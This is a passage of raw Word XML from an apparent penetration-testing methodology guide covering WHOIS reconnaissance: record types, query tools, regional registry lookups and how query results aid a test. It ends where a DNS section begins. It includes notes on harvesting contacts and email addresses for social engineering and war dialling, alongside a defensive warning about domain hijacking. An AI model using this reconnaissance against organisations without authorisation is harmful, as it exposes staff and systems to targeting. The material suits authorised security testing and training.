    <w:p w:rsidR="006E4C8B" w:rsidRPr="00357924" w:rsidRDefault="006E4C8B" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Registrar:</w:t>
      </w:r>
      <w:r w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00CB0734" w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Specific registrar information and associated whois server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E4C8B" w:rsidRPr="00357924" w:rsidRDefault="006E4C8B" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Organisational:</w:t>
      </w:r>
      <w:r w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00CB0734" w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Information related to a particular organisation (i.e. name &amp; address)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E4C8B" w:rsidRPr="00357924" w:rsidRDefault="006E4C8B" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Domain:</w:t>
      </w:r>
      <w:r w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00CB0734" w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Information related to a particular registered domain name</w:t>
      </w:r>
      <w:r w:rsidR="00C823A3" w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> including:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C823A3" w:rsidRPr="00357924" w:rsidRDefault="00C823A3" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Registrant</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C823A3" w:rsidRPr="00357924" w:rsidRDefault="00C823A3" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Domain name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C823A3" w:rsidRPr="00357924" w:rsidRDefault="00C823A3" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Admin contact</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C823A3" w:rsidRPr="00357924" w:rsidRDefault="00C823A3" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Record creation dates</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C823A3" w:rsidRPr="00357924" w:rsidRDefault="00C823A3" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Primary and secondary DNS servers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E4C8B" w:rsidRPr="00357924" w:rsidRDefault="006E4C8B" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Network:</w:t>
      </w:r>
      <w:r w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00CB0734" w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Information related to a particular registered network block or IP address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E4C8B" w:rsidRDefault="006E4C8B" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Point of Contact:</w:t>
      </w:r>
      <w:r w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00CB0734" w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Information related to administrative contacts for the registered object</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357924" w:rsidRDefault="00357924" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Maintainer d</w:t>
      </w:r>
      <w:r w:rsidR="00DA49F8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>etails:</w:t>
      </w:r>
      <w:r w:rsidR="00DA49F8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>Information about the recorder maintainer such as email and auth method</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357924" w:rsidRPr="00357924" w:rsidRDefault="00357924" w:rsidP="00357924">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CB0734" w:rsidRPr="00357924" w:rsidRDefault="00CB0734" w:rsidP="00B50C46">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CB0734" w:rsidRPr="00357924" w:rsidRDefault="00C823A3" w:rsidP="00B50C46">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHOIS databases</w:t>
      </w:r>
      <w:r w:rsidR="00CB0734" w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be queried using numerous </w:t>
      </w:r>
      <w:r w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHOIS tools. </w:t>
      </w:r>
      <w:r w:rsidR="00CB0734" w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Common whois clients include:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB0734" w:rsidRPr="00357924" w:rsidRDefault="00CB0734" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>whois</w:t>
      </w:r>
      <w:r w:rsidR="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Unix command line client</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB0734" w:rsidRPr="00357924" w:rsidRDefault="00CB0734" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>whois.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>- Windows command line client (sysinternals)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB0734" w:rsidRPr="00357924" w:rsidRDefault="00CB0734" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SAM Spade</w:t>
      </w:r>
      <w:r w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">- Windows GUI client and web based services </w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r w:rsidRPr="00357924">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://www.samspade.org</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB0734" w:rsidRPr="00357924" w:rsidRDefault="00CB0734" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NIC web interfaces  </w:t>
      </w:r>
      <w:r w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>- regional whois servers:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00006DBE" w:rsidRPr="00357924" w:rsidRDefault="00006DBE" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">AfriNIC: </w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r w:rsidRPr="00357924">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://whois.afrinic.net/</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APNIC: </w:t>
      </w:r>
      <w:hyperlink r:id="rId29" w:history="1">
        <w:r w:rsidRPr="00357924">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://www.apnic.net/whois/</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ARIN: </w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidRPr="00357924">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://ws.arin.net/whois/</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LACNIC: </w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidRPr="00357924">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://whois.lacnic.net/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E4C8B" w:rsidRPr="00357924" w:rsidRDefault="00006DBE" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RIPE NCC: </w:t>
      </w:r>
      <w:hyperlink r:id="rId32" w:history="1">
        <w:r w:rsidRPr="00357924">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://www.ripe.net/whois/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C66DE" w:rsidRPr="00357924" w:rsidRDefault="000C66DE" w:rsidP="00B50C46">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BA26ED" w:rsidRPr="00357924" w:rsidRDefault="00357924" w:rsidP="00B50C46">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHOIS query uses</w:t>
      </w:r>
      <w:r w:rsidR="00C823A3" w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> during penetration test:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C823A3" w:rsidRPr="00357924" w:rsidRDefault="00C823A3" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Registrar queries identify the registrar for the organisation, domain, or netblock.</w:t>
      </w:r>
      <w:r w:rsidR="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> This information can be used for subsequent queries. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00006DBE" w:rsidRPr="00357924" w:rsidRDefault="00C823A3" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Organisational queries identify registered domains, netblock, contacts that are associated with an organisation.</w:t>
      </w:r>
      <w:r w:rsidR="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> This helps identify the organisation Internet presence.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C823A3" w:rsidRPr="00357924" w:rsidRDefault="00C823A3" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Domain queries help to identify if the domain belongs to a </w:t>
      </w:r>
      <w:r w:rsidR="00357924" w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>particular</w:t>
      </w:r>
      <w:r w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> entity and if so what the </w:t>
      </w:r>
      <w:r w:rsidR="00565F48" w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>administrative contact and DNS server det</w:t>
      </w:r>
      <w:r w:rsidR="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ails are for that</w:t>
      </w:r>
      <w:r w:rsidR="00565F48" w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> domain. Administrative contact information can be used for social engineering and identifying for phone/fax numbers </w:t>
      </w:r>
      <w:r w:rsidR="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">that can be used </w:t>
      </w:r>
      <w:r w:rsidR="00565F48" w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">for war dialling. Record creation and modification dates </w:t>
      </w:r>
      <w:r w:rsidR="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">help </w:t>
      </w:r>
      <w:r w:rsidR="00565F48" w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>indicate the accuracy of the information. Authoritat</w:t>
      </w:r>
      <w:r w:rsidR="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ive DNS server</w:t>
      </w:r>
      <w:r w:rsidR="00565F48" w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">details </w:t>
      </w:r>
      <w:r w:rsidR="00565F48" w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">can be used for DNS integration. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C823A3" w:rsidRPr="00357924" w:rsidRDefault="00565F48" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Network queries identify the network IP address block associated with the domain name, IP address, or organisation. This is useful to determine whether a system is actually owned by the target organisation or if it is being co-located or hosted by another organisation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C66DE" w:rsidRDefault="00565F48" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>POC queries indentify domains associated with users</w:t>
      </w:r>
      <w:r w:rsidR="00357924" w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> database handle</w:t>
      </w:r>
      <w:r w:rsidR="00357924" w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> which can uncover a domain that you were unaware of. You may also indentify</w:t>
      </w:r>
      <w:r w:rsidR="00357924" w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> a list of mail addresses associated with a given domain that could be useful in social engineering attacks.</w:t>
      </w:r>
      <w:r w:rsidRPr="00357924">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA49F8" w:rsidRPr="00DA49F8" w:rsidRDefault="00DA49F8" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Maintainer queries can identify the maintainer details for the registration record. This can highlight the authentication method for making updates and could include the details email/password to make the updates. It’s important to use a secure update mechanism (i.e. PGP, actual contact) to prevent domain hijacking attacks. Email and weak password based auth (password/MD5) is discouraged for this reason.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B50C46" w:rsidRDefault="00B50C46" w:rsidP="00B50C46">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>C2 -Domain Name Server (DNS)</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B50C46" w:rsidRDefault="00B50C46" w:rsidP="00B50C46">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>C2a - DNS queries and responses</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00451D54" w:rsidRPr="00844A83" w:rsidRDefault="00357924" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00844A83">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00DA49F8" w:rsidRPr="00844A83">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>omain Name System (D</w:t>
      </w:r>
      <w:r w:rsidRPr="00844A83">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NS</w:t>
      </w:r>
